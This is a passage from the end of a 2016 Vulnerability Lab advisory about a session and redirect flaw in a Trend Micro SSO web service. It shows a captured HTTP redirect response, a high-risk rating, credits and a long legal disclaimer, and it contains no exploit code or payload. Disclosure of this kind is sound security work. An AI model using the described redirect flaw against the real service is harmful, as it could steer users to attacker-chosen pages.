ir6.fp.ne1.yahoo.com (ApacheTrafficServer)] Server[ATS] Location[https://www.yahoo.com/my_account/] Content-Type[text/html] Content-Language[en] Cache-Control[no-store, no-cache] y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--] Content-Length[382] X-Firefox-Spdy[h2] Security Risk: ============== The security risk of the session web and redirect vulnerability in the trend micro sso online service web-application is estimated as high. (CVSS 6.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution Security GmbH] [http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
